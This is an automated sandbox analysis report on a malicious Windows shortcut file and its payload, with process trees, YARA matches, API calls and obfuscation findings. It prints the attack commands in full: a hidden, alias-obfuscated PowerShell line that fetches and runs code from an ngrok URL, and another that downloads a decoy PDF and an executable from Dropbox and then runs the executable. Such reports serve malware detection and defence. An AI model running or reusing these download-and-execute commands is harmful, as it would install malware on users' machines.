                    Source: 111392827.exe, 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_4366f925-1
                    Source: 111392827.exe, 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_62a4e576-f
                    Source: Yara match File source: 25.3.fontdrvhost.exe.53e0000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 24.3.111392827.exe.2fa0000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 25.3.fontdrvhost.exe.5600000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 24.3.111392827.exe.2d80000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000019.00000003.2646521849.0000000005600000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000019.00000003.2645361356.00000000053E0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: 111392827.exe PID: 9612, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: fontdrvhost.exe PID: 9640, type: MEMORYSTR

                    System Summary

                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe File dump: PerfectouinVans.exe.22.dr 979567347
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\111392827.exe
                    Source: qxjDerXRGR.lnk LNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 22_2_00447F20 NtQueryDefaultLocale,22_2_00447F20
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 22_2_00448357 NtQueryDefaultLocale,22_2_00448357
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 22_2_00447BED NtQueryDefaultLocale,22_2_00447BED
                    Source: C:\Windows\System32\fontdrvhost.exe Code function: 29_2_00000202B2F51CF4 NtAcceptConnectPort,CloseHandle,29_2_00000202B2F51CF4
                    Source: C:\Windows\System32\fontdrvhost.exe Code function: 29_2_00000202B2F515C0 NtAcceptConnectPort,29_2_00000202B2F515C0
                    Source: C:\Windows\System32\fontdrvhost.exe Code function: 29_2_00000202B2F51AA4 NtAcceptConnectPort,NtAcceptConnectPort,29_2_00000202B2F51AA4
                    Source: C:\Windows\System32\fontdrvhost.exe Code function: 29_2_00000202B2F50AC8 NtAcceptConnectPort,NtAcceptConnectPort,29_2_00000202B2F50AC8
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 22_2_00460070: DeviceIoControl,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,22_2_00460070
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 22_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,22_2_0041E0F0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 24_2_0041E0F0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,24_2_0041E0F0
                    Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                    Source: classification engine Classification label: mal100.troj.evad.winLNK@82/287@21/13
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 22_2_00419CF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,22_2_00419CF0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 22_2_00419D90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,CloseHandle,22_2_00419D90
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 24_2_00419CF0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetLastError,24_2_00419CF0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 24_2_00419D90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,CloseHandle,24_2_00419D90
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 22_2_00463750 GetDiskFreeSpaceW,22_2_00463750
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 22_2_004197C0 LoadBitmapW,CoInitialize,CoCreateInstance,CoUninitialize,CoSetProxyBlanket,CoUninitialize,CoUninitialize,VariantInit,VariantClear,VariantClear,VariantClear,CoUninitialize,22_2_004197C0
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Code function: 22_2_0041B4B0 OpenSCManagerW,OpenServiceW,CloseServiceHandle,QueryServiceStatus,QueryServiceStatus,ControlService,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,StartServiceW,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,22_2_0041B4B0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8248:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Mutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-b96944b1-fc36-a7801a-f3dda4a79090}
                    Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess9800
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhezbhxu.zcm.ps1
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\conhost.exe File read: C:\Users\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                    Source: qxjDerXRGR.lnk ReversingLabs: Detection: 21%
                    Source: 111392827.exe String found in binary or memory: -InstallNative
                    Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                    Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2032,i,3747438541677274565,12230203629466347722,262144 /prefetch:3
                    Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" "
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6552 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6924 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=7468 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\1262855704.pdf
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=8484 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:6
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2092,i,15797820631052527623,15050807233246554643,262144 /prefetch:3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\111392827.exe "C:\Users\user\AppData\Local\Temp\111392827.exe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Process created: C:\Users\user\AppData\Local\Temp\111392827.exe "C:\Users\user\AppData\Local\Temp\111392827.exe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 9612 -s 472
                    Source: C:\Windows\SysWOW64\fontdrvhost.exe Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                    Source: C:\Windows\System32\fontdrvhost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 9800 -s 144
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6860 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\399226976.bat" "
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2032,i,3747438541677274565,12230203629466347722,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6552 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6924 --field-trial-handle=2092,i,13486326528998633438,17759938227910158544,262144 /prefetch:8
                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: k7rn7l32.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: ntd3ll.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                    Source: qxjDerXRGR.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: Binary string: wkernel32.pdb source: 111392827.exe, 00000018.00000003.2638528309.0000000002EA0000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2638367786.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644916290.0000000005500000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644772476.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdb source: 111392827.exe, 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: ntdll.pdb source: 111392827.exe, 00000018.00000003.2636412906.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2636644786.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643153256.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2642593564.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: 111392827.exe, 00000018.00000003.2637136208.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2637912190.0000000002F20000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643951128.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb`Il source: 111392827.exe, 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000000.2449232884.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000002.2669074846.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000018.00000000.2620655010.000000000047C000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: ntdll.pdbUGP source: 111392827.exe, 00000018.00000003.2636412906.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2636644786.0000000002F70000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643153256.00000000055D0000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2642593564.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: 111392827.exe, 00000018.00000003.2637136208.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2637912190.0000000002F20000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2643951128.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernel32.pdbUGP source: 111392827.exe, 00000018.00000003.2638528309.0000000002EA0000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2638367786.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644916290.0000000005500000.00000004.00000001.00020000.00000000.sdmp, fontdrvhost.exe, 00000019.00000003.2644772476.00000000053E0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: wkernelbase.pdbUGP source: 111392827.exe, 00000018.00000003.2639140917.0000000002D80000.00000004.00000001.00020000.00000000.sdmp, 111392827.exe, 00000018.00000003.2639519078.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp
                    Source: Binary string: D:\winapps\gu6\exe\vc\DiskDefrag\sourcecode\Release_s\DiskDefrag.pdb source: 111392827.exe, 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000000.2449232884.000000000047C000.00000002.00000001.01000000.0000000F.sdmp, 111392827.exe, 00000016.00000002.2669074846.00000000026D0000.00000004.00001000.00020000.00000000.sdmp, 111392827.exe, 00000018.00000000.2620655010.000000000047C000.00000002.00000001.01000000.0000000F.sdmp

                    Data Obfuscation

                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1' -OutFile $RandomPDF ; Start-Process msedge.exe -ArgumentList \"--kiosk $RandomPDF\" ; IWR -Uri 'https://www.dropbox.com/scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1' -OutFile $RandomEXE ; start $RandomEXE"
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_004150A0 GetModuleHandleW,LoadLibraryW,GetProcAddress,22_2_004150A0
                    Source: 111392827.exe.16.drStatic PE information: real checksum: 0xf661c should be: 0x1c6367
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_0050E58E push ecx; ret 22_2_0050E5A1
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00473991 push ecx; ret 22_2_004739A4
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 22_2_00433FF1 push ss; retf 22_2_00433FF2
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060B8EC push edi; ret 24_3_0060B8F8
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060A0F9 push FFFFFF82h; iretd 24_3_0060A0FB
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_00608904 push ecx; ret 24_3_00608917
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060B1DC push eax; ret 24_3_0060B1DD
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060D2FB push edi; ret 24_3_0060D2CC
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060BC39 push ecx; ret 24_3_0060BC59
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060DD01 push esi; ret 24_3_0060DD6A
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_0060FE8F push esi; ret 24_3_0060FEA1
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_3_00609F6A push eax; ret 24_3_00609F75
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043B01B pushfd ; ret 24_2_0043B14E
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0044C190 pushfd ; iretd 24_2_0044C1EF
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0044B2B0 pushfd ; ret 24_2_0044B2CA
                    Source: C:\Users\user\AppData\Local\Temp\111392827.exeCode function: 24_2_0043A49C push esp; ret 24_2_0043A6C7
